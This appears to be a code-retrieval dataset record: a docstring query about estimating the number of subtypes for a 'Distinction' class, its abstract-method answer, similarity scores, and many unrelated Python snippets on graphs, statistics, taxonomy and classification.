"def get_graph_tuple(nodes, globals=None):\n\tnodes_shape = nodes.shape\n\tbatch_size = nodes_shape[0]\n\tnum_nodes = tf.ones([batch_size], dtype=tf.int32)\n\tnum_edges = tf.ones([batch_size], dtype=tf.int32)\n\t# defining num_nodes & num_edges for each sample in a batch of input graphs\n\tb_num_nodes = nodes_shape[1]*num_nodes\n\tb_num_edges = (nodes_shape[1]**2)*num_edges\n\t# rehaping (b, num_nodes, dims) -> (b*num_nodes, dims)\n\tnodes = tf.reshape(nodes, [nodes_shape[0] * nodes_shape[1], nodes_shape[2]])\n\tif globals is not None:\n\t\tglobals_shape = globals.shape\n\t\tglobals = tf.reshape(globals, [globals_shape[0] * globals_shape[1],\n\t\t\t\t\t\t\tglobals_shape[2]])\n\t\tgraph_tuple = graphs.GraphsTuple(nodes=nodes, globals=globals)\n\telse:\n\t\tgraph_tuple = graphs.GraphsTuple(nodes=nodes, globals=None, edges=None,\n\t\t\t\t\t\t\t\t\t\t n_node=b_num_nodes, n_edge=b_num_edges,\n\t\t\t\t\t\t\t\t\t\t senders=None, receivers=None)\n\treturn graph_tuple",
"def generateCombos(vars,constants):\n # SUPER NOT GENERALIZED---TOO LATE AT NIGHT FOR ME TO DO RECURSIVE ALGORITHMS\n assert len(vars) == 2 and len(constants) == 2\n combs = []\n for c1 in constants:\n for c2 in constants:\n combs.append(Grounding([(vars[0], c1), (vars[1], c2)]))\n return combs"
] | [
"0.6162866",
"0.60737395",
"0.56084675",
"0.5604049",
"0.5572062",
"0.55707884",
"0.5547834",
"0.5473386",
"0.54535896",
"0.54377645",
"0.5403645",
"0.5399105",
"0.53836566",
"0.5325518",
"0.5313336",
"0.5309223",
"0.5285266",
"0.52835023",
"0.5281857",
"0.52793276",
"0.52750707",
"0.5272496",
"0.5256191",
"0.5253513",
"0.5253208",
"0.5230315",
"0.5202073",
"0.5174802",
"0.5167406",
"0.51576334",
"0.513413",
"0.5124367",
"0.51200587",
"0.5099855",
"0.5095381",
"0.5083169",
"0.5062148",
"0.50387913",
"0.50376195",
"0.50370264",
"0.5020031",
"0.501621",
"0.50077236",
"0.5005994",
"0.50015634",
"0.49984843",
"0.49979436",
"0.49914777",
"0.49897304",
"0.4946081",
"0.49457794",
"0.4942098",
"0.4932983",
"0.4930739",
"0.4920656",
"0.49172986",
"0.49076685",
"0.48978686",
"0.48968446",
"0.48921824",
"0.48869208",
"0.48831293",
"0.4870421",
"0.4870017",
"0.4859651",
"0.48536807",
"0.48408657",
"0.48312768",
"0.4814618",
"0.48119724",
"0.48085365",
"0.4804875",
"0.48047003",
"0.47985333",
"0.47965947",
"0.47914183",
"0.47908562",
"0.47900093",
"0.47834435",
"0.47826767",
"0.47793084",
"0.4777522",
"0.47770295",
"0.47753128",
"0.47728923",
"0.4767957",
"0.475829",
"0.4753831",
"0.47372544",
"0.47361213",
"0.47304514",
"0.47291154",
"0.47183728",
"0.47182888",
"0.47174814",
"0.47170013",
"0.47163576",
"0.4714001",
"0.47081676",
"0.47052547"
] | 0.7116983 | 0 |
Get an estimate of the number of different subtypes for this distinction. This is used to estimate a PDF for randomly sampling the distinction space. Examine the code of other distinctions to get a feel for how things are estimated. | def getNumberOfSubtypes(config, low_estimate=True):
raise AbstractMethodException(Distinction) | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def getNumberOfBaseDistinctionsNeeded():\n\n raise AbstractMethodException(Distinction)",
"def findAtypicalTerms(self):\n self.atypicalTermsDict = collections.OrderedDict()\n distanceList = list()\n distance = 0\n for key in self.summaryFilteredDict:\n partitionName = str(key).split(\" :\")[0]\n partition = voc.getPartition(partitionName)\n modNames = partition.getModNames()\n currentModality = str(key).split(\": \")[1]\n indexCurrentModality = modNames.index(currentModality)\n coverCurrentModality = self.getCoverFromModalityInDictionnary(self.summaryFilteredDict,partitionName + \" : \" + currentModality) #cover(v',R)\n if coverCurrentModality > 0:\n for modality in partition.getModalities():\n coverModality = self.getCoverFromModalityInDictionnary(self.summaryFilteredDict,partitionName + \" : \" + modality.getName()) # cover(v,R)\n if modality.isTrapeziumModality():\n indexModality = modNames.index(modality.getName())\n distance = abs(indexCurrentModality - indexModality) / (partition.getNbModalities() - 1) #d(v,v')\n elif modality.isEnumModality():\n if (modality.getName() == currentModality):\n distance = 0\n else:\n distance = 1\n distanceList.append(min(distance, 1 - coverCurrentModality, coverModality)) # min(d(v,v'),cover(v,R),1-cover(v',R))\n self.atypicalTermsDict[partitionName + \" : \" + currentModality] = max(distanceList) # D(v',R)\n distanceList = list()",
"def test_get_tax_return_frequencies(self):\n pass",
"def get_type_stats(self):\n if not self.fitted:\n raise ValueError(\"Vocabulary hasn't been computed yet\")\n\n total_types = len(self.freqs)\n known_types = len(self) - len(self.reserved)\n return known_types, total_types, known_types / total_types",
"def specificity(self):\n result = 0\n for focal, value in self.items():\n if focal.cardinal > 0:\n result += value / focal.cardinal\n return round(result, 6)",
"def prob_t_N(genotype, base):\n cnter = Counter(genotype)\n return cnter.get(base, 0) * 1/len(genotype)",
"def get_num_classes(self):",
"def calculate_size(self, num_dots):\n self.objects = num_dots\n square = sqrt(self.objects)\n if self.objects % square == 0:\n return int(square), int(square)\n else:\n denom = self.objects // sqrt(self.objects)\n while self.objects % denom != 0:\n denom -= 1\n return int(denom), int(self.objects // denom)",
"def subtype_counts(node_set, G, log=False):\n subtypes = Counter()\n for n in node_set:\n subtype = G.node[n]['subtype']\n subtypes[subtype] += 1\n\n if log:\n for k, v in subtypes.items():\n subtypes[k] = np.log10(v)\n \n return subtypes",
"def _calcTypeDist(self, uSignType, uPassiveShape,\n dbSignType, dbPassiveShape):\n if dbSignType != uSignType:\n # different type\n typeDist = 1\n else:\n # the same type\n if dbSignType == 'passive hand':\n if dbPassiveShape == uPassiveShape:\n # the same shape\n typeDist = 0\n else:\n # different shape\n typeDist = 0.5\n else:\n # the same type other than 'passive hand'\n typeDist = 0\n return typeDist",
"def getDensityEstimate(self):\n return self.density",
"def class_size(self):\n\t\tif self.subject.count()==0:\n\t\t\treturn student.objects.all().filter(reg=self).count()\n\t\telse:\n\t\t\treturn self.grade_set.all().distinct().count()",
"def create_subspace_preference_dimensionality(self):\n # For each point compute number of dimensions that have a lower variance then delta\n spd = np.count_nonzero(self.attribute_variances < self.delta, axis=1)\n return spd",
"def N(self) -> int:\n n_types = len(self)\n return n_types",
"def generatePDI(self,level='species',type='richness'):\n if type == 'richness':\n import biodiversity.richness as rich\n pdi = rich(self)\n try:\n return pdi[level]\n except:\n logger.error(\"[biospatial.gbif.taxonomy.distanceToTree] level selected non existent (used %s)\" %level)",
"def getDimensionality(self):\n dimensionality = self._distribution.returnDimensionality()\n return dimensionality",
"def n(self):\n return len(self.genotypes)",
"def num_depth(self):\n return len(self._sizes) + len(self._ratios) - 1",
"def target_pdf(p, disttype):\n me, cov = target_params(disttype)\n if disttype == 'round' or disttype == 'correlated':\n prob = multivariate_normal.pdf(p, mean=me, cov=cov)\n elif disttype == 'bimodal' or disttype == 'close_bimodal':\n prob0 = multivariate_normal.pdf(p, mean=me[0], cov=cov)\n prob1 = multivariate_normal.pdf(p, mean=me[1], cov=cov)\n prob = max([prob0, prob1]) \n \n return prob",
"def determine_size(self):\n size = np.inf\n while size >= self.n:\n size = np.random.pareto(0.2)\n size = int(math.ceil(size))\n return size",
"def denominator(self, ???):",
"def data_type_ratio(self):\n if self.sample_size:\n return float(self.match_count) / self.sample_size\n return None",
"def class_size(self):\n if not self.is_mutation_finite():\n return infinity\n else:\n components = []\n multiplicities = []\n for x in self.irreducible_components():\n if components.count(x) == 0:\n components.append(x)\n multiplicities.append(1)\n else:\n y = components.index(x)\n multiplicities[y] = multiplicities[y]+1\n\n sizes = [ x.class_size() for x in components ]\n if NotImplemented in sizes:\n print(\"Size unknown\")\n return NotImplemented\n else:\n return prod( [binomial(sizes[i]+multiplicities[i]-1,\n multiplicities[i] ) for i in range (0,len(sizes))])",
"def measures(self, actual, top, nSugg):\n m2 = 0.0\n m3 = 0.0\n for categorySug, count in top:\n if categorySug in actual:\n m2 += 1.0\n else:\n for cR in actual:\n if self.getFatherSon(cR, categorySug) != None:\n m3 += 0.5\n elif self.getBrothers(cR, categorySug) != None:\n m3 += 0.25\n m3 /= len(actual)\n m2 /= nSugg\n m3 = m2 + m3 / nSugg\n return 1 if m2 > 0 else 0, m2, m3",
"def total_sdram_requirements(self):",
"def top_dimensionality(self):\n return self._vocab_size",
"def subtype_occurences(self):\n\n subtype_counts = Counter()\n\n for seqkey,seqs in self.seqs.iteritems():\n for seq,seqentry in seqs.iteritems():\n\n subtype_counts[seqentry['subtype']] += 1\n\n return subtype_counts",
"def getDistType(self):\n return self.distType",
"def get_utilization(self):\n child_prefixes = Prefix.objects.filter(prefix__net_contained_or_equal=str(self.prefix))\n # Remove overlapping prefixes from list of children\n networks = cidr_merge([c.prefix for c in child_prefixes])\n children_size = float(0)\n for p in networks:\n children_size += p.size\n return int(children_size / self.prefix.size * 100)",
"def mutual_info_score(self):\n _, _, I_CK = self._entropies()\n return I_CK / self.grand_total",
"def __len__(self) -> int:\n\n length = self.n_classes * 100\n\n return length",
"def get_ndof(model: BDF, subcase: Subcase) -> Tuple[int, int, int]:\n ndof_per_grid = 6\n if 'HEAT' in subcase:\n ndof_per_grid = 1\n ngrid = model.card_count['GRID'] if 'GRID' in model.card_count else 0\n nspoint = len(model.spoints) # if 'SPOINT' in model.card_count else 0\n nepoint = len(model.epoints) # if 'EPOINT' in model.card_count else 0\n ndof = ngrid * ndof_per_grid + nspoint + nepoint\n #print(f'ngrid={ngrid} nspoint={nspoint}')\n assert ndof > 0, model.card_count\n return ngrid, ndof_per_grid, ndof",
"def test_for_arbitrarily_complicated_substance():\n verify_atomic_weight_for_substance(\"Al4O2H2\", 141.94015428)",
"def __repr__(self):\r\n return self.get_distribution_type()",
"def evaluate_dep_type_sets():\n strategies = {\n 'defensive': ['agent', 'advcl', 'parataxis'],\n 'aggressive': ['agent', 'advcl', 'parataxis', 'dep', 'aux', 'ccomp', 'xcomp', 'dobj', 'pobj', 'nsubj', 'nsubjpass', 'cc', 'abbrev', 'purpcl', 'predet', 'preconj', 'advmod', 'neg', 'rcmod', 'tmod', 'poss', 'prepc'],\n 'compromise_1': ['agent', 'advcl', 'parataxis', 'aux', 'xcomp', 'pobj', 'nsubjpass', 'cc', 'abbrev', 'purpcl', 'predet', 'neg', 'tmod', 'poss', 'prepc'],\n 'compromise_2': ['agent', 'advcl', 'parataxis', 'aux', 'xcomp', 'pobj', 'nsubjpass', 'cc', 'abbrev', 'purpcl', 'predet', 'neg', 'tmod', 'poss', 'prepc', 'attr', 'csubj', 'csubjpass', 'number', 'possessive', 'punct', 'ref']\n }\n results = {'classification':{}, 'retrieval':{}}\n\n print '------ CLASSIFICATION EVALUATION --------'\n print '> Reading cases..'\n descriptions_path = '../data/tasa/TASA900_dependencies'\n texts, labels = data.read_files(descriptions_path)\n print '> Creating representations..'\n rep = {}\n for strategy in strategies:\n rep[strategy] = []\n metric = graph.GraphMetrics.CLOSENESS\n for i, text in enumerate(texts):\n if i%10==0: print ' ',str(i)+'/'+str(len(texts))\n for strategy in strategies:\n g = graph_representation.construct_dependency_network(text, exclude=strategies[strategy])\n d = graph_representation.graph_to_dict(g, metric)\n rep[strategy].append(d)\n g = None # just to make sure. I don't trust this damn garbage collector...\n for strategy in strategies:\n rep[strategy] = graph_representation.dicts_to_vectors(rep[strategy])\n print '> Evaluating..'\n for strategy in strategies:\n score = evaluation.evaluate_classification(rep[strategy], labels)\n print ' ', strategy, score\n results['classification'][strategy] = score\n\n data.pickle_to_file(results, 'output/dependencies/types_set_eval_tmp')\n\n print '------ RETRIEVAL EVALUATION --------'\n print '> Reading cases..'\n descriptions_path = '../data/air/problem_descriptions_dependencies'\n description_texts, labels = data.read_files(descriptions_path)\n solutions_path = '../data/air/solutions_preprocessed'\n solution_texts, labels = data.read_files(solutions_path)\n solution_vectors = freq_representation.text_to_vector(solution_texts, freq_representation.FrequencyMetrics.TF_IDF)\n print '> Creating representations..'\n rep = {}\n for strategy in strategies:\n rep[strategy] = []\n metric = graph.GraphMetrics.EIGENVECTOR\n for i, text in enumerate(description_texts):\n if i%1==0: print ' ',str(i)+'/'+str(len(description_texts))\n full_graph = graph_representation.construct_dependency_network(text)\n for strategy in strategies:\n g = graph_representation.construct_dependency_network(text, exclude=strategies[strategy])\n d = graph_representation.graph_to_dict(g, metric)\n rep[strategy].append(d)\n g = None # just to make sure..\n full_graph = None\n #~ if i%100==0: data.pickle_to_file(rep, 'output/dependencies/types_eval_rep_'+str(i))\n for strategy in strategies:\n rep[strategy] = graph_representation.dicts_to_vectors(rep[strategy])\n print '> Evaluating..'\n for strategy in strategies:\n score = evaluation.evaluate_retrieval(rep[strategy], solution_vectors)\n print ' ', strategy, score\n results['retrieval'][strategy] = score\n\n pp.pprint(results)\n data.pickle_to_file(results, 'output/dependencies/types_set_eval')\n\n return results",
"def totalize_natures(sv):\r\n tot=0 \r\n for nod in sv.Object.values():\r\n tot+=len(nod.nature)\r\n return tot",
"def num_depth(self):\n if self._index == 0:\n return len(self._ratios)\n else:\n return len(self._sizes) + len(self._ratios) - 1",
"def my_dimension(self) -> Nat:\n my_part = self.my_diagram.as_list()\n sum_phat_sq = sum((z*(2*i+1) for (i, z) in enumerate(my_part)))\n dimension = 0\n num_odd_parts = sum((z % 2 for z in my_part))\n if self.my_type is LieType.A:\n dimension = (self.lie_rank+1)**2 - sum_phat_sq\n elif self.my_type is LieType.D:\n dimension = 2*(self.lie_rank**2) - self.lie_rank - \\\n sum_phat_sq//2 + num_odd_parts//2\n elif self.my_type is LieType.B:\n dimension = 2*(self.lie_rank**2) + self.lie_rank - \\\n sum_phat_sq//2 + num_odd_parts//2\n elif self.my_type is LieType.C:\n dimension = 2*(self.lie_rank**2) + self.lie_rank - \\\n sum_phat_sq//2 - num_odd_parts//2\n else:\n raise ValueError(\n \"Lie type must be one of the 4 classical families\")\n return dimension",
"def getNDF(self):\n\t\tNDF = 0\n\t\tfor s in range(self.nSect):\n\t\t\tif not s in self.funcs:\n\t\t\t\tcontinue\n\t\t\tfor i,b in enumerate(range(self.borders[s],self.borders[s+1])):\n\t\t\t\tif self.hasMassRange:\n\t\t\t\t\tif s in self.massRanges:\n\t\t\t\t\t\tbinCenterMass = self.binCenters[b]\n\t\t\t\t\t\tif binCenterMass < self.massRanges[s][0] or binCenterMass >= self.massRanges[s][1]:\n\t\t\t\t\t\t\tcontinue\n\t\t\t\tNDF += 2\n\t\treturn (NDF, 2*self.nZero, 2*self.nFunc, self.nPar)",
"def size(self):",
"def prob(throw, n, d=6, type='classical'):\n count = 0\n table = throw_table(n, d, type)\n for t in table:\n if sum(t) == throw:\n count += 1\n \n return float(count)/len(table)",
"def count_vario(dist_param, picker_param):\n orig = '/home/zby/MAGISTERKA/MGR/results/oryginal.clustered.t'\n cl_orig = read_clustered(orig)\n name_tag = ''\n ndist = dist_param[1:]\n npick = picker_param[1:]\n for index in drange(5, 20, 0.5):\n name_tag = \"{}_{}_{}\".format(index, npick, ndist)\n try:\n clust2 = read_clustered(tfidf_name('merged.stem{}.stop.clustered.t', name_tag))\n except:\n print(\"no data for {}\".format(name_tag))\n continue\n var, norm = variation_of_information(cl_orig, clust2)\n print(\" {} VOI is {}\".format(name_tag, norm))",
"def DAM_class_level(self, class_entity: und.Ent):\n if \"Interface\" in class_entity.kindname():\n return 2.0\n\n private_variables = len(class_entity.ents(\"Define\", \"Java Variable Private Member\"))\n protected_variables = len(class_entity.ents(\"Define\", \"Java Variable Protected Member\"))\n default_variables = len(class_entity.ents(\"Define\", \"Java Variable Default Member\"))\n public_variables = len(class_entity.ents(\"Define\", \"Java Variable Public Member\"))\n\n try:\n enum_ = private_variables + protected_variables\n denum_ = private_variables + protected_variables + default_variables + public_variables\n ratio = enum_ / denum_\n except ZeroDivisionError:\n # logger.error('ZeroDivisionError in computing QMOOD DAM metric.')\n ratio = 2.0\n return 1. + ratio",
"def calc_el_dem_ap(nb_occ, el_random, type):\n\n assert nb_occ > 0\n assert nb_occ <= 5, 'Number of occupants cannot exceed 5 per ap.'\n assert type in ['sfh', 'mfh']\n\n if el_random:\n # Choose first entry of random sample list\n el_dem = usunc.calc_sampling_el_demand_per_apartment(\n nb_samples=1,\n nb_persons=nb_occ,\n type=type)[0]\n else:\n # Choose average value depending on nb_occ\n # Class D without hot water (Stromspiegel 2017)\n dict_sfh = {1: 2500,\n 2: 3200,\n 3: 3900,\n 4: 4200,\n 5: 5400}\n\n dict_mfh = {1: 1500,\n 2: 2200,\n 3: 2800,\n 4: 3200,\n 5: 4000}\n\n if type == 'sfh':\n el_dem = dict_sfh[nb_occ]\n elif type == 'mfh':\n el_dem = dict_mfh[nb_occ]\n\n return el_dem",
"def test_get_tax_return_frequencies_key(self):\n pass",
"def size(cls):\n return (cls.num_properties()*2 + 2)",
"def test_count_genomic_types(self):\n \n result, bed_result = parse_AS_STRUCTURE_dict(\"test\", clipper.test_dir())\n result = count_genomic_types(result)\n \n self.assertDictEqual(result, {\"CE:\" : 14})",
"def compute_statistics(self):",
"def get_N_teachers(school_type, N_classes):\n\tteachers = {\n\t\t'primary':N_classes + int(N_classes / 2),\n\t\t'primary_dc':N_classes * 2,\n\t\t'lower_secondary':int(N_classes * 2.5),\n\t\t'lower_secondary_dc':N_classes * 3,\n\t\t'upper_secondary':int(N_classes * 2.85),\n\t\t'secondary':int(N_classes * 2.5),\n\t\t'secondary_dc':int(N_classes * 2.5)\n\t}\n\treturn teachers[school_type]",
"def __len__(self):\n return sum(self.size_freqs.values())",
"def __len__(self):\n return self.params['nbins_sfh']+2 # z, mass, met, + logsfr_ratios",
"def __len__(self):\n return self.params['nbins_sfh']+2 # z, mass, met, + logsfr_ratios",
"def __len__(self):\n return self.params['nbins_sfh']+2 # z, mass, met, + logsfr_ratios",
"def __len__(self):\n return self.params['nbins_sfh']+2 # z, mass, met, + logsfr_ratios",
"def variations():",
"def N(self):\n return self.get_dof()",
"def get_length_itertools(iter_type, iter_obj, iter_size):\n\n candidates = len(iter_obj)\n if 'permutation' in iter_type:\n total = 1\n for i in range(iter_size):\n total *= (candidates - i)\n elif 'product' in iter_type:\n total = candidates ** iter_size\n elif 'combination' in iter_type:\n total = binomail(candidates, iter_size)\n return total",
"def get_importance(self, key, value, depth):\n multiplier = 0.8 ** depth if depth > 1 else 1.0\n base = 0.0\n if key in ['condition', 'symptom', 'disease', 'treatment']:\n base += 5\n elif key in ['gender', 'age'] or 'location' in key:\n base += 4\n elif 'condition' in key or 'symptom' in key or 'disease' in key or 'treatment' in key:\n base += 3\n else:\n base += 2\n return multiplier * base",
"def ANA(self):\n MITs = []\n dbx: und.Db = und.open(self.udb_path)\n filter2 = \"Java Class ~Unresolved ~Unknown ~TypeVariable ~Anonymous ~Enum, Java Interface\"\n known_class_entities = dbx.ents(filter2)\n\n for class_entity in known_class_entities:\n if \"Interface\" in class_entity.kindname():\n continue\n mit = class_entity.metric(['MaxInheritanceTree'])['MaxInheritanceTree']\n MITs.append(mit)\n\n dbx.close()\n return sum(MITs) / len(MITs) if len(MITs) > 0 else 0.",
"def _nbytes(self, deep: bool = False) -> int:\n # for implementations with no useful getsizeof (PyPy)\n objsize = 24\n\n level_nbytes = sum(i.memory_usage(deep=deep) for i in self.levels)\n label_nbytes = sum(i.nbytes for i in self.codes)\n names_nbytes = sum(getsizeof(i, objsize) for i in self.names)\n result = level_nbytes + label_nbytes + names_nbytes\n\n # include our engine hashtable\n result += self._engine.sizeof(deep=deep)\n return result",
"def GOAL_TOTAL() -> int:\n return 21",
"def specificity(confusion):\n classes = range(confusion.shape[0])\n num = (np.sum(confusion[classes]) - np.sum(confusion[classes], axis=0) -\n np.sum(confusion[classes], axis=1) + confusion[classes, classes])\n den = ((np.ones(confusion.shape[0]) * np.sum(confusion[classes])) -\n np.sum(confusion[classes], axis=1))\n return num / den",
"def n(self):\n raise NotImplementedError",
"def information(self, fdist):\n freq = fdist.get(self.string)\n if not freq:\n freq = 0\n return 1 - (log(freq + 1) / log(fdist.N() + 1))",
"def get_effect_size(df1, df2):\n p1 = np.mean(df1)\n p2 = np.mean(df2)\n print(\"Effect size: {}\".format(round(proportion_effectsize(p1, p2),4)))",
"def test_subsample_taxonomy(self):\n basic_test_runner(self, 'taxonomy', nrows=6, niter=3, normalize='subsample')",
"def sample_representations_shape(self):\n return (N_DIMS_PER_REP,)",
"def denominator(self):\n return 1",
"def solve_sample_size(self):\n e = self.normalized_effect_size()\n df_denom_solve = FTestPower().solve_power(\n effect_size=e\n ,df_num=None\n ,df_denom=self.df_num\n ,alpha=self.alpha\n ,power=(1 - self.beta)\n ,ncc=1\n )\n n = int(df_denom_solve + len(self.test_splits))\n return n",
"def getDimensionality(self):\n return self.dimensionality",
"def main():\n for combination in indicated_combinations(7, 3):\n print(\"{}: {}\".format(\"\".join(map(str, combination)),\n (longest_consecutive_run(combination, 7))))\n run_lengths = Counter(longest_consecutive_run(combination, 7)\n for combination in indicated_combinations(7, 3))\n print(\"Lengths: {}\".format(run_lengths))\n print(\"Total N_3: {}\".format(run_lengths[3]))\n print(\"Total N_2: {}\".format(run_lengths[2]))\n print(\"Proportion N_3 / (N_3 + N_2): {}\".format(\n Fraction(run_lengths[3], run_lengths[2] + run_lengths[3])))",
"def get_typical_size(workers: List[List[int]]) -> int:\n size = 0\n for worker in workers:\n size = max([size,\n np.abs(worker[2]-worker[0]),\n np.abs(worker[3]-worker[1])])\n \n return size",
"def Type(self) -> _n_6_t_5:",
"def freq(self) -> int:",
"def get_total_disc_effect_size(self, nmontecarlo=20000):\n \n if self.total_disc_es is None:\n disc_log_evidences = [self.results[kernel].summary(b=self.b)['evidence']['md'] \n for kernel in self.kernel_dict.keys()]\n M = len(disc_log_evidences)\n Z = logSumExp(disc_log_evidences)\n disc_evidences = np.exp(disc_log_evidences - Z)\n disc_stats = [self.results[kernel].summary(b=self.b)['es_disc_stats'] \n for kernel in self.kernel_dict.keys()]\n samples = list() \n for i in range(M):\n samples += list(np.random.normal(loc=disc_stats[i][0], \n scale=disc_stats[i][1], \n size=int(nmontecarlo*disc_evidences[i])))\n \n kde_fit = stats.gaussian_kde(samples, bw_method='silverman')\n xrange = np.linspace(np.min(samples), np.max(samples), 500)\n es_bma = kde_fit(xrange)\n self.total_disc_es = np.sum(xrange*es_bma) * (xrange[1]-xrange[0])\n self.total_disc_pdf = (xrange, es_bma)\n return self.total_disc_es",
"def get_age_distribution(school_type, N_classes):\n\tage_bracket = get_age_bracket(school_type)\n\tclasses = list(range(1, N_classes + 1))\n\tN_age_bracket = len(age_bracket)\n\tclasses_per_age_bracket = int(N_classes / N_age_bracket)\n\t\n\tassert N_age_bracket <= N_classes, \\\n\t'not enough classes to accommodate all age brackets in this school type!'\n\t\n\tage_bracket_map = {i:[] for i in age_bracket}\n\t\n\t# easiest case: the number of classes is divisible by the number of floors\n\tif N_classes % N_age_bracket == 0:\n\t\tfor i, age_bracket in enumerate(age_bracket):\n\t\t\tage_bracket_map[age_bracket] = classes[i * classes_per_age_bracket:\\\n\t\t\t\t\t i * classes_per_age_bracket + classes_per_age_bracket]\n\t\t\n\t# if there are leftover classes: assign them one-by-one to the existing \n\t# age brackets, starting with the lowest\n\telse:\n\t\tleftover_classes = N_classes % N_age_bracket\n\t\tclasses_per_age_bracket += 1\n\t\tfor i, age_bracket in enumerate(age_bracket):\n\t\t\tif i < leftover_classes:\n\t\t\t\tage_bracket_map[age_bracket] = \\\n\t\t\t\t\t\tclasses[i * classes_per_age_bracket: \\\n\t\t\t\t\t\ti * classes_per_age_bracket + classes_per_age_bracket]\n\t\t\t# hooray, index magic!\n\t\t\telse:\n\t\t\t\tage_bracket_map[age_bracket] = \\\n\t\t\t\t\tclasses[leftover_classes * classes_per_age_bracket + \\\n\t\t\t\t\t (i - leftover_classes) * (classes_per_age_bracket - 1):\n\t\t\t\t\tleftover_classes * (classes_per_age_bracket) + \\\n\t\t\t\t\t (i - leftover_classes) * (classes_per_age_bracket - 1) + \\\n\t\t\t\t\t classes_per_age_bracket - 1]\n\t\n\t# invert dict for easier use\n\tage_bracket_map_inv = {}\n\tfor age_bracket, classes in age_bracket_map.items():\n\t\tfor c in classes:\n\t\t\tage_bracket_map_inv.update({c:age_bracket}) \n\t\t\t\t\n\treturn age_bracket_map_inv",
"def design_complexity(design: Design) -> int:\n diversity = 3 * len(design.required)\n abundance = 2 * sum(design.required.values())\n return diversity + abundance + design.additional",
"def evaluate_power(soldier_list: List[Soldier]):\n inf_count = 0\n inf_avg_weapon = 0.0\n inf_avg_armor = 0.0\n arc_count = 0\n arc_avg_weapon = 0.0\n arc_avg_armor = 0.0\n cvl_count = 0\n cvl_avg_weapon = 0.0\n cvl_avg_armor = 0.0\n \n for soldier in soldier_list:\n ################################# YOUR CODE HERE #################################\n if soldier.typecode == \"ARC\":\n arc_count += 1\n arc_avg_armor += soldier.armor\n arc_avg_weapon += soldier.weapon\n elif soldier.typecode == \"INF\":\n inf_count += 1\n inf_avg_armor += soldier.armor\n inf_avg_weapon += soldier.weapon\n elif soldier.typecode == \"CVL\":\n cvl_count += 1\n cvl_avg_armor += soldier.armor\n cvl_avg_weapon += soldier.weapon\n if arc_count != 0:\n arc_avg_armor /= arc_count\n arc_avg_weapon /= arc_count\n\n if cvl_count != 0:\n cvl_avg_armor /= cvl_count\n cvl_avg_weapon /= cvl_count\n\n if inf_count != 0:\n inf_avg_armor /= inf_count\n inf_avg_weapon /= inf_count\n ##################################################################################\n return (inf_count, inf_avg_weapon, inf_avg_armor), (arc_count, arc_avg_weapon, arc_avg_armor), (cvl_count, cvl_avg_weapon, cvl_avg_armor)",
"def fitness(self):\n return (len(self.body)**2) * self.age",
"def count_topic_dist(self):\n if len(self.representants) == 0:\n self.log_writer(\"Representants not set. Cannot make topic dist.\")\n return\n for key, value in self.representants.items():\n self.topic_distributions.append(len(value)/len(self.training_docs))\n self.topic_numbers.append(key)",
"def occupation_distribution(data):",
"def DPI(self):\r\n logger.info(\"DPI (Dependency Parent Inherited)\")\r\n logger.info(\"Step1: Get all parent and child classes\")\r\n inh = self.get_node_by_name(\"inheritance\")\r\n logger.debug(\"inheritance: %s\" % inh)\r\n logger.info(\"Step2: Get all Depends relation classes\")\r\n dep = self.get_node_by_name(\"depends\")\r\n logger.debug(\"depends: %s\" % dep)\r\n return self.__DPI_helper(inh, dep)",
"def get_size_distribution(self) -> Dict[int, int]:\n size_dist = dict()\n for complex_expression, complex_abundance in self.get_all_complexes_and_abundances():\n current_size = complex_expression.get_size_of_complex()\n if current_size in size_dist:\n size_dist[current_size] += complex_abundance\n else:\n size_dist[current_size] = complex_abundance\n sorted_dist = dict(sorted(size_dist.items(), key=lambda item: item[0]))\n return sorted_dist",
"def number_types(corpus):\n number_of_types = len(set(corpus))\n return number_of_types",
"def children_per_woman(self):\n return self.birthrate",
"def substructure_sim_exact(subtrees_1, subtrees_2):\n assert(len(subtrees_1) == len(subtrees_2))\n n = len(subtrees_1)\n f1 = np.zeros(n)\n for i in range(n):\n f1[i] = subtrees_1[i] == subtrees_2[i] # calculate the number of matching pairs\n\n return float(np.count_nonzero(f1)) / float(len(f1))",
"def classProbs(observation, tree, classes):\n res = classify(observation, tree) #res = results\n total = sum(res.values())\n probs = []\n for c in classes:\n if c in res.keys():\n probs.append(float(res[c])/total)\n else:\n probs.append(0)\n return probs",
"def purity_test(self):\n mean = filter_data(self.data,self.ancestors)['Class'].mean()\n if mean == 0:\n return 0\n elif mean == 1:\n return 1\n return None",
"def calcHeuristicFunc(self, dictio):\n\t\t_sum = 0\n\n\t\tfor u in self.unitlist:\n\t\t for p in self.units[u[0]]:\n\t\t nums = [0] *self.N**2\n\t\t for i in p:\n\t\t nums[dictio[i]-1] += 1\n\t\t for j in nums:\n\t\t if(j==0):\n\t\t _sum += 1\n\t\treturn _sum",
"def denominator(self,gold,length):\n size = length * (length - 1) \n\n gold_size = 0.0\n for lead in gold.keys():\n gold_size += len(gold[lead])\n \n #print 'Whazzup'\n #print gold_size\n #print size\n den1 = gold_size\n den2 = size - gold_size \n #print den1\n #print den2\n return den1/den2",
"def calculate(self):\n\n specificity = self.confusion_matrix.tn / (self.confusion_matrix.tn + self.confusion_matrix.fp)\n return 1 - specificity",
"def class_size(self):\n if not self.is_mutation_finite():\n return infinity\n\n # type A (finite and affine)\n if self._letter == 'A':\n # the formula is taken from Torkildsen - Counting\n # cluster-tilted algebras of type A\n if self.is_finite():\n n = self._rank\n a = binomial( 2*(n+1), n+1 ) // (n+2)\n if n % 2 == 1:\n a += binomial( n+1, (n+1)//2 )\n if n % 3 == 0:\n a += 2 * binomial( 2*n//3, n//3 )\n return a // (n+3)\n # the formula is taken from Bastian, Prellberg, Rubey, Stump\n elif self.is_affine():\n i,j = self._bi_rank\n i = ZZ(i)\n j = ZZ(j)\n n = i+j\n f = Euler_Phi()\n if i == j:\n return ( binomial( 2*i,i ) +\n sum( f(k) * binomial(2*i//k,i//k)**2\n for k in [k for k in i.divisors()\n if k in j.divisors()] ) // n ) // 4\n else:\n return sum( f(k) * binomial(2*i//k,i//k) *\n binomial(2*j//k,j//k)\n for k in [k for k in i.divisors()\n if k in j.divisors()] ) // ( 2 * n )\n\n # types B and C (finite and affine)\n elif self._letter in ['B', 'C']:\n # this formula is proven but nowhere published correctness\n # is clear enough that I don't think a warning is needed\n if self.is_finite():\n n = self._rank\n return binomial(2 * n, n) // (n + 1)\n\n elif self._letter in ['BB','CC']:\n # these two formulas are not yet proven\n print(Warning(\"Warning: This method uses a formula \"\n \"which has not been proved correct.\"))\n if self.is_affine():\n if 